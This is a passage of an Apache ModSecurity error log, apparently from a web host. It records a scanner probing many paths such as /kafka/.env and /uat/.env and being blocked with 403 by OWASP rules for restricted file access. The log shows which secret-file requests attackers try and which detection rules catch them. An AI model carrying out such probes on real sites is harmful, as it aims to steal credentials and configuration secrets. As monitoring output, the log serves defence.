"agHo0lV4kyjgo4bQBUhYGwAAAM0"]
[Mon May 11 16:33:54.518382 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/rabbitmq/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYGwAAAM0"]
[Mon May 11 16:33:54.518619 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/rabbitmq/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYGwAAAM0"]
[Mon May 11 16:33:54.682076 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/kafka/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYHQAAAM0"]
[Mon May 11 16:33:54.682463 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/kafka/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYHQAAAM0"]
[Mon May 11 16:33:54.682658 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/kafka/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYHQAAAM0"]
[Mon May 11 16:33:54.682916 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/kafka/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYHQAAAM0"]
[Mon May 11 16:33:54.847679 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/queue/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYHgAAAM0"]
[Mon May 11 16:33:54.848062 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/queue/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYHgAAAM0"]
[Mon May 11 16:33:54.848265 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/queue/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYHgAAAM0"]
[Mon May 11 16:33:54.848520 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/queue/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYHgAAAM0"]
[Mon May 11 16:33:55.011352 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/worker/.env"] [unique_id "agHo01V4kyjgo4bQBUhYHwAAAM0"]
[Mon May 11 16:33:55.011726 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/worker/.env"] [unique_id "agHo01V4kyjgo4bQBUhYHwAAAM0"]
[Mon May 11 16:33:55.011923 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/worker/.env"] [unique_id "agHo01V4kyjgo4bQBUhYHwAAAM0"]
[Mon May 11 16:33:55.012192 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/worker/.env"] [unique_id "agHo01V4kyjgo4bQBUhYHwAAAM0"]
[Mon May 11 16:33:55.165449 2026] [:error] [pid 1411099:tid 1411104] [client 46.151.178.13:60178] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Mon May 11 16:33:55.491756 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/job/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fQAAAIg"]
[Mon May 11 16:33:55.492336 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/job/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fQAAAIg"]
[Mon May 11 16:33:55.492530 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/job/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fQAAAIg"]
[Mon May 11 16:33:55.493618 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/job/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fQAAAIg"]
[Mon May 11 16:33:55.651209 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/test/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fgAAAIg"]
[Mon May 11 16:33:55.651768 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/test/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fgAAAIg"]
[Mon May 11 16:33:55.652055 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/test/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fgAAAIg"]
[Mon May 11 16:33:55.652429 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/test/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fgAAAIg"]
[Mon May 11 16:33:55.810785 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/qa/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fwAAAIg"]
[Mon May 11 16:33:55.811367 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/qa/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fwAAAIg"]
[Mon May 11 16:33:55.811650 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/qa/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fwAAAIg"]
[Mon May 11 16:33:55.812012 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/qa/.env"] [unique_id "agHo0_y_GXSWIKeli0v1fwAAAIg"]
[Mon May 11 16:33:55.976400 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/preview/.env"] [unique_id "agHo0_y_GXSWIKeli0v1gAAAAIg"]
[Mon May 11 16:33:55.976948 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/preview/.env"] [unique_id "agHo0_y_GXSWIKeli0v1gAAAAIg"]
[Mon May 11 16:33:55.977248 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/preview/.env"] [unique_id "agHo0_y_GXSWIKeli0v1gAAAAIg"]
[Mon May 11 16:33:55.977598 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/preview/.env"] [unique_id "agHo0_y_GXSWIKeli0v1gAAAAIg"]
[Mon May 11 16:33:56.136362 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/beta/.env"] [unique_id "agHo1Py_GXSWIKeli0v1gQAAAIg"]
[Mon May 11 16:33:56.136744 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/beta/.env"] [unique_id "agHo1Py_GXSWIKeli0v1gQAAAIg"]
[Mon May 11 16:33:56.136935 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/beta/.env"] [unique_id "agHo1Py_GXSWIKeli0v1gQAAAIg"]
[Mon May 11 16:33:56.137204 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/beta/.env"] [unique_id "agHo1Py_GXSWIKeli0v1gQAAAIg"]
[Mon May 11 16:33:56.294681 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/uat/.env"] [unique_id "agHo1Py_GXSWIKeli0v1ggAAAIg"]
[Mon May 11 16:33:56.295060 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 